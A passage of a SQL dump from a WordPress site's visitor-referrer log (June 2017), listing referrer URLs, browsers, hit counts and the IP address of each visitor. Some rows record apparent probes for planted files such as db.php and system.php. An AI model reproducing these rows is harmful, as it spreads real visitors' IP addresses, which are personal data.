','','184.154.36.171','000',3,0),(6008,'2017-06-16','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','202.46.49.207','000',1,0),(6009,'2017-06-16','http://kazan.zrus.org/','MSIE','Windows','4.01','','46.119.116.109','000',2,0),(6010,'2017-06-16','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','14.199.153.220','000',1,0),(6011,'2017-06-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.37.82','000',2,0),(6012,'2017-06-16','http://m.facebook.com','AppleWebKit','iPhone','603.2.4','','72.192.255.62','000',1,0),(6013,'2017-06-16','http://cheboksary.zrus.org/','Opera','Windows','7.0','','46.119.116.109','000',1,0),(6014,'2017-06-16','http://www.zphibmaryland.org/chapters/','Edge','Windows','14.14393','','73.172.1.173','000',4,0),(6015,'2017-06-16','http://zphiblgz.org','Chrome','Windows','37.0.2111.84','','23.236.233.95','000',2,0),(6016,'2017-06-16','https://bpro1.top/','Opera','Windows','8.00','','46.118.117.158','000',3,0),(6017,'2017-06-16','http://perm-profnastil.ru/','MSIE','Windows','6.0','','46.118.124.89','000',3,0),(6018,'2017-06-16','https://www.google.com/','Safari','iPhone','9.0','','174.194.132.75','000',3,0),(6019,'2017-06-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.3.160.122','000',2,0),(6020,'2017-06-16','http://zphiblgz.org','Firefox','Windows','40.1','','120.59.22.174','000',2,0),(6021,'2017-06-16','http://mebel-vstroika.ru/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(6022,'2017-06-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','13.84.174.191','000',1,0),(6023,'2017-06-16','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','13.84.174.191','000',1,0),(6024,'2017-06-16','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','71.121.204.212','000',3,0),(6025,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','31.0.124.118','000',2,0),(6026,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','14.201.10.211','000',4,0),(6027,'2017-06-17','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.166','000',7,0),(6028,'2017-06-17','http://nodup.ru/','MSIE','Windows','6.0','','46.118.117.158','000',5,0),(6029,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','115.178.238.17','000',2,0),(6030,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','180.190.46.119','000',2,0),(6031,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','60.92.116.213','000',2,0),(6032,'2017-06-17','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','176.57.141.66','000',6,0),(6033,'2017-06-17','http://zphiblgz.org','Chrome','Linux','51.0.2704.103','','176.57.141.66','000',1,0),(6034,'2017-06-17','http://zphiblgz.org','Firefox','Windows','29.0','','176.57.141.66','000',1,0),(6035,'2017-06-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.48.253','000',2,0),(6036,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','94.59.206.130','000',2,0),(6037,'2017-06-17','http://mygameplus.ru/','MSIE','Windows','6.0','','46.118.124.89','000',3,0),(6038,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','188.255.146.218','000',2,0),(6039,'2017-06-17','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(6040,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','83.178.235.247','000',2,0),(6041,'2017-06-17','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','89.238.181.94','000',1,0),(6042,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','5.29.121.95','000',2,0),(6043,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','170.84.8.196','000',2,0),(6044,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','77.46.181.140','000',2,0),(6045,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','86.236.9.228','000',2,0),(6046,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','151.229.174.204','000',2,0),(6047,'2017-06-17','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','188.226.128.101','000',5,0),(6048,'2017-06-17','http://www.zetmaster.ru/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6049,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','81.7.111.24','000',2,0),(6050,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','103.199.155.234','000',2,0),(6051,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','49.150.30.15','000',2,0),(6052,'2017-06-17','http://zphiblgz.org/temp1-1.php','Chrome','Windows','5.0.375.99','','119.47.117.11','000',1,0),(6053,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','180.191.114.137','000',2,0),(6054,'2017-06-17','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','69.143.34.19','000',1,0),(6055,'2017-06-17','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.41.211','000',2,0),(6056,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','141.126.62.250','000',2,0),(6057,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','49.150.120.241','000',2,0),(6058,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','124.105.114.69','000',2,0),(6059,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','109.127.107.234','000',2,0),(6060,'2017-06-17','http://www.google.com/','Chrome','Android','58.0.3029.83','','205.197.242.155','000',1,0),(6061,'2017-06-17','https://www.google.com/','Safari','iPad','10.0','','192.12.13.14','000',1,0),(6062,'2017-06-17','android-app://com.google.android.googlequicksearchbox','Chrome','Android','58.0.3029.83','','166.137.244.16','000',1,0),(6063,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','179.211.105.186','000',2,0),(6064,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','176.63.75.177','000',2,0),(6065,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','41.45.140.176','000',2,0),(6066,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','84.125.146.6','000',2,0),(6067,'2017-06-17','https://www.google.com/','Safari','iPhone','10.0','','174.205.0.147','000',1,0),(6068,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','93.87.158.252','000',2,0),(6069,'2017-06-17','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(6070,'2017-06-17','https://www.google.com/','Safari','iPhone','10.0','','174.205.10.253','000',1,0),(6071,'2017-06-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(6072,'2017-06-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',4,0),(6073,'2017-06-17','http://zphiblgz.org/wp-content/plugins/wp-db-backup-made1/system.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(6074,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','41.97.73.64','000',2,0),(6075,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','189.48.240.75','000',2,0),(6076,'2017-06-17','http://zphiblgz.org','Chrome','Android','58.0.3029.83','','73.213.22.160','000',8,0),(6077,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','175.138.139.41','000',2,0),(6078,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','138.185.63.2','000',2,0),(6079,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','213.8.204.34','000',2,0),(6080,'2017-06-17','https://www.google.com/','Safari','Macintosh','9.1.3','','98.231.133.102','000',1,0),(6081,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','179.217.163.58','000',2,0),(6082,'2017-06-17','android-app://com.google.android.googlequicksearchbox','Chrome','Android','56.0.2924.87','','66.87.81.195','000',1,0),(6083,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','78.1.36.83','000',2,0),(6084,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','190.45.249.200','000',2,0),(6085,'2017-06-17','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.169.251','000',1,0),(6086,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','179.187.40.9','000',2,0),(6087,'2017-06-17','https://www.google.com/','Safari','iPhone','10.0','','72.83.242.22','000',1,0),(6088,'2017-06-17','http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=0ahUKEwjQ_tr-_8XUAhWB4D4KHVLCDooQjxwIAw&url=http%3A%2F%2Fzphiblgz.org%2Fmembers%2F&psig=AFQjCNGQvuv7jw4gW_5OBn3B2eQ5YW3RTQ&ust=1497827391243426&cad=rjt','MSIE','Windows','11.0','','76.117.161.185','000',1,0),(6089,'2017-06-17','http://zphiblgz.org/wp-content/plugins/three-column-screen-layout/db.php','Chrome','Windows','5.0.375.99','','31.47.73.67','000',1,0),(6090,'2017-06-17','https://www.google.com/','Safari','iPhone','10.0','','100.36.69.101','000',2,0),(6091,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','111.93.78.133','000',2,0),(6092,'2017-06-17','http://zphiblgz.org/programs/','Safari','iPad','10.0','','73.173.91.7','000',1,0),(6093,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','89.216.23.52','000',2,0),(6094,'2017-06-17','http://vladivostok.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',2,0),(6095,'2017-06-17','http://greenzaim.ru/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(6096,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','5.88.82.147','000',2,0),(6097,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','77.141.12.172','000',2,0),(6098,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','117.233.50.182','000',2,0),(6099,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','188.129.130.201','000',2,0),(6100,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','197.248.171.178','000',2,0),(6101,'2017-06-17','http://zphiblgz.org','Firefox','Windows','40.1','','124.106.141.223','000',2,0),(6102,'2017-06-18','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','198.27.80.144','000',2,0),(6103,'2017-06-18','https://www.google.com/','Chrome','Chrome OS','58.0.3029.140','','73.201.197.234','000',22,0),(6104,'2017-06-18','https://www.google.com/','Chrome','iPhone','59.0.3071.102','','68.33.77.93','000',6,0),(6105,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','200.171.160.113','000',2,0),(6106,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','83.34.179.104','000',2,0),(6107,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','81.24.241.225','000',2,0),(6108,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','80.95.8.14','000',2,0),(6109,'2017-06-18','http://zphiblgz.org','Firefox','Windows','21.0','','5.9.112.6','000',1,0),(6110,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','192.99.35.167','000',2,0),(6111,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','182.187.0.94','000',2,0),(6112,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','103.240.193.161','000',2,0),(6113,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','139.216.10.180','000',2,0),(6114,'2017-06-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.95.180','000',1,0),(6115,'2017-06-18','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.87','000',1,0),(6116,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','180.190.39.125','000',2,0),(6117,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','175.140.91.80','000',2,0),(6118,'2017-06-18','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(6119,'2017-06-18','http://zphiblgz.org/wp-admin/','Firefox','Windows','3.5.0','','192.187.108.186','000',4,0),(6120,'2017-06-18','http://zphiblgz.org','MSIE','Windows','9.0','','192.187.108.186','000',2,0),(6121,'2017-06-18','http://zphiblgz.org/wp-content/themes/gaukingo/db.php','Chrome','Windows','5.0.375.99','','103.6.198.76','000',1,0),(6122,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','217.30.207.89','000',2,0),(6123,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','77.141.12.172','000',2,0),(6124,'2017-06-18','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','209.200.35.221','000',1,0),(6125,'2017-06-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','209.200.35.220','000',1,0),(6126,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','210.195.255.18','000',2,0),(6127,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','110.22.13.20','000',2,0),(6128,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','191.5.236.114','000',2,0),(6129,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','41.63.166.15','000',2,0),(6130,'2017-06-18','https://ohmyrings.com/','MSIE','Windows','6.0','','46.118.117.158','000',7,0),(6131,'2017-06-18','http://astrakhan.zrus.org/','MSIE','Windows','3.02','','46.119.116.109','000',2,0),(6132,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','59.85.31.29','000',2,0),(6133,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','39.55.56.208','000',2,0),(6134,'2017-06-18','https://www.google.com/','Chrome','Android','58.0.3029.83','','73.128.45.236','000',1,0),(6135,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','109.98.241.27','000',2,0),(6136,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','202.57.96.154','000',2,0),(6137,'2017-06-18','http://www.japan-bearings.ru/','MSIE','Unknown','6.0','','46.118.124.89','000',3,0),(6138,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','188.26.18.47','000',2,0),(6139,'2017-06-18','http://zphiblgz.org/wp-form-ajax.php','Chrome','Windows','5.0.375.99','','80.87.203.9','000',1,0),(6140,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','115.99.171.52','000',2,0),(6141,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','77.138.87.31','000',2,0),(6142,'2017-06-18','http://zphiblgz.org','Firefox','Windows','28.0','','159.203.105.15','000',2,0),(6143,'2017-06-18','http://zphiblgz.org','Safari','Macintosh','7.0.3','','159.203.105.15','000',1,0),(6144,'2017-06-18','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','159.203.105.15','000',1,0),(6145,'2017-06-18','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','159.203.105.15','000',2,0),(6146,'2017-06-18','http://zphiblgz.org','Firefox','Windows','29.0','','159.203.105.15','000',1,0),(6147,'2017-06-18','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','159.203.105.15','000',1,0),(6148,'2017-06-18','http://zphiblgz.org','Firefox','Macintosh','29.0','','159.203.105.15','000',1,0),(6149,'2017-06-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(6150,'2017-06-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',4,0),(6151,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','41.36.43.205','000',2,0),(6152,'2017-06-18','https://maslenka.kz/','MSIE','Windows','6.0','','46.118.125.174','000',6,0),(6153,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','105.172.14.94','000',2,0),(6154,'2017-06-18','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.80','000',1,0),(6155,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','185.3.147.231','000',2,0),(6156,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','185.4.255.234','000',2,0),(6157,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','181.188.24.46','000',2,0),(6158,'2017-06-18','http://novgorod.zrus.org/','Opera','Windows','7.11','','46.119.116.109','000',2,0),(6159,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','2.92.31.13','000',2,0),(6160,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','61.3.193.91','000',2,0),(6161,'2017-06-18','http://zphiblgz.org/wp-content/uploads/db.php','Chrome','Windows','5.0.375.99','','193.107.88.86','000',1,0),(6162,'2017-06-18','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/db_info.class.php','Chrome','Windows','5.0.375.99','','212.223.29.26','000',1,0),(6163,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','79.246.229.10','000',2,0),(6164,'2017-06-18','http://demian.kz/','MSIE','Windows','6.0','','178.137.4.41','000',5,0),(6165,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','120.188.33.101','000',2,0),(6166,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','77.228.126.168','000',2,0),(6167,'2017-06-18','https://vpnmouse.com/','MSIE','Windows','6.0','','46.118.124.89','000',1,0),(6168,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','178.219.136.38','000',2,0),(6169,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','188.247.77.99','000',2,0),(6170,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','177.72.83.58','000',2,0),(6171,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','112.198.71.67','000',2,0),(6172,'2017-06-18','http://typer.one/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6173,'2017-06-18','http://zphiblgz.org','Firefox','Windows','40.1','','5.186.127.146','000',2,0),(6174,'2017-06-18','http://tver.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',2,0),(6175,'2017-06-19','http://zphiblgz.org','Chrome','Linux','12.0.742.100','','176.31.126.56','000',1,0),(6176,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','85.154.61.239','000',2,0),(6177,'2017-06-19','http://zphiblgz.org','Firefox','Linux','30.0','','52.90.62.172','000',1,0),(6178,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','196.1.224.19','000',2,0),(6179,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','103.70.130.186','000',2,0),(6180,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','24.52.137.145','000',2,0),(6181,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','182.71.91.217','000',2,0),(6182,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','183.83.94.170','000',2,0),(6183,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','188.249.172.8','000',2,0),(6184,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','89.44.193.210','000',2,0),(6185,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','173.234.140.43','000',2,0),(6186,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','64.119.200.171','000',2,0),(6187,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','121.152.120.138','000',2,0),(6188,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','103.242.14.2','000',2,0),(6189,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','125.59.35.100','000',2,0),(6190,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','212.80.2.212','000',2,0),(6191,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','197.237.182.85','000',2,0),(6192,'2017-06-19','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.81','','163.172.4.153','000',1,0),(6193,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','210.186.54.114','000',2,0),(6194,'2017-06-19','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.71.157.89','000',1,0),(6195,'2017-06-19','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.17.224.61','000',2,0),(6196,'2017-06-19','zphiblgz.org','Chrome','Windows','50.0.2661.75','','192.99.3.81','000',2,0),(6197,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','93.43.192.220','000',2,0),(6198,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','103.196.137.212','000',2,0),(6199,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','139.167.6.250','000',2,0),(6200,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','49.148.0.40','000',2,0),(6201,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','82.76.41.211','000',2,0),(6202,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','186.109.191.21','000',2,0),(6203,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','82.237.241.87','000',2,0),(6204,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','179.105.231.100','000',2,0),(6205,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','95.180.95.71','000',2,0),(6206,'2017-06-19','http://yoshkarola.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',1,0),(6207,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','68.207.118.178','000',2,0),(6208,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','117.199.1.11','000',2,0),(6209,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','181.64.241.169','000',2,0),(6210,'2017-06-19','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(6211,'2017-06-19','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.111.146','000',1,0),(6212,'2017-06-19','http://zphiblgz.org','Firefox','Macintosh','29.0','','138.197.111.146','000',1,0),(6213,'2017-06-19','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.111.146','000',1,0),(6214,'2017-06-19','http://sevastopol.zrus.org/','Opera','Windows','9.01','','46.119.116.109','000',1,0),(6215,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','70.66.220.62','000',2,0),(6216,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','60.243.81.82','000',2,0),(6217,'2017-06-19','http://www.zphibmaryland.org/chapters/','Chrome','Windows','58.0.3029.110','','71.121.240.181','000',16,0),(6218,'2017-06-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(6219,'2017-06-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',4,0),(6220,'2017-06-19','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','69.143.34.19','000',5,0),(6221,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','95.244.163.138','000',2,0),(6222,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','37.157.219.211','000',2,0),(6223,'2017-06-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','46.161.9.54','000',1,0),(6224,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','177.40.182.47','000',2,0),(6225,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','59.182.165.73','000',2,0),(6226,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','186.19.87.61','000',2,0),(6227,'2017-06-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(6228,'2017-06-19','https://www.google.com/','Chrome','Windows','58.0.3029.110','','73.191.86.14','000',4,0),(6229,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','72.51.112.42','000',2,0),(6230,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','41.97.116.177','000',2,0),(6231,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','183.87.239.48','000',2,0),(6232,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','103.238.229.71','000',2,0),(6233,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','94.2.143.92','000',2,0),(6234,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','41.140.18.196','000',2,0),(6235,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','179.221.107.156','000',2,0),(6236,'2017-06-19','http://videochat.cafe/','MSIE','Windows','7.0b','','46.118.124.89','000',3,0),(6237,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','143.0.18.145','000',2,0),(6238,'2017-06-19','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.213.18','000',6,0),(6239,'2017-06-19','https://www.google.com/','Chrome','Windows','49.0.2623.112','','72.89.212.99','000',1,0),(6240,'2017-06-19','http://videochat.world/','Unknown','Unknown','Unknown','','46.118.125.174','000',3,0),(6241,'2017-06-19','https://bpro1.top/','MSIE','Windows','6.0','','46.118.117.158','000',2,0),(6242,'2017-06-19','http://life-instyle.com/architectural-design.html','Unknown','Unknown','Unknown','','46.118.117.158','000',1,0),(6243,'2017-06-19','http://yoshkarola.zrus.org/','MSIE','Windows','2.0','','46.119.116.109','000',3,0),(6244,'2017-06-19','http://www.zphibmaryland.org/chapters/','Firefox','Windows','53.0','','71.206.31.225','000',4,0),(6245,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','217.75.82.15','000',2,0),(6246,'2017-06-19','http://zphiblgz.org','Firefox','Windows','40.1','','121.52.146.74','000',2,0),(6247,'2017-06-20','https://www.google.com/','Edge','Windows','14.14393','','73.163.245.53','000',3,0),(6248,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','178.149.115.147','000',2,0),(6249,'2017-06-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.5','000',1,0),(6250,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','124.107.245.25','000',2,0),(6251,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','203.88.138.46','000',2,0),(6252,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','212.189.140.212','000',2,0),(6253,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','37.205.98.54','000',2,0),(6254,'2017-06-20','http://free-gluten.ru/','Opera','Windows','9.00','','46.118.117.158','000',2,0),(6255,'2017-06-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.32','000',1,0),(6256,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','80.188.143.131','000',2,0),(6257,'2017-06-20','http://zphiblgz.org','MSIE','Windows','9.0','','172.222.185.9','000',1,0),(6258,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','178.220.104.149','000',2,0),(6259,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','175.139.162.27','000',2,0),(6260,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','180.191.71.217','000',2,0),(6261,'2017-06-20','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(6262,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','41.35.26.45','000',2,0),(6263,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','70.70.125.253','000',2,0),(6264,'2017-06-20','http://www.japan-bearings.ru/','MSIE','Windows','6.0','','46.118.124.89','000',5,0),(6265,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','95.15.74.225','000',2,0),(6266,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','121.166.159.156','000',2,0),(6267,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','122.174.124.29','000',2,0),(6268,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','195.88.72.205','000',2,0),(6269,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','88.15.72.132','000',2,0),(6270,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','105.102.75.213','000',2,0),(6271,'2017-06-20','http://voronezh.zrus.org/','Opera','Windows','9.00','','46.119.116.109','000',2,0),(6272,'2017-06-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.115','000',1,0),(6273,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','83.66.167.228','000',2,0),(6274,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','93.35.214.139','000',2,0),(6275,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','39.51.192.18','000',2,0),(6276,'2017-06-20','http://www.zetmaster.ru/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6277,'2017-06-20','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.103','000',1,0),(6278,'2017-06-20','http://www.4istoshop.com/','Opera','Windows','9.0','','46.118.117.158','000',1,0),(6279,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','197.2.10.92','000',2,0),(6280,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','95.180.119.206','000',2,0),(6281,'2017-06-20','http://murmansk.xrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(6282,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','79.169.92.238','000',2,0),(6283,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','219.204.159.157','000',2,0),(6284,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','202.80.216.57','000',2,0),(6285,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','46.214.243.231','000',2,0),(6286,'2017-06-20','http://zphiblgz.org','Firefox','Windows','40.1','','188.54.135.152','000',2,0),(6287,'2017-06-20','http://zphiblgz.org','Chrome','Macintosh','55.0.2883.95','','52.87.86.158','000',2,0),(6288,'2017-06-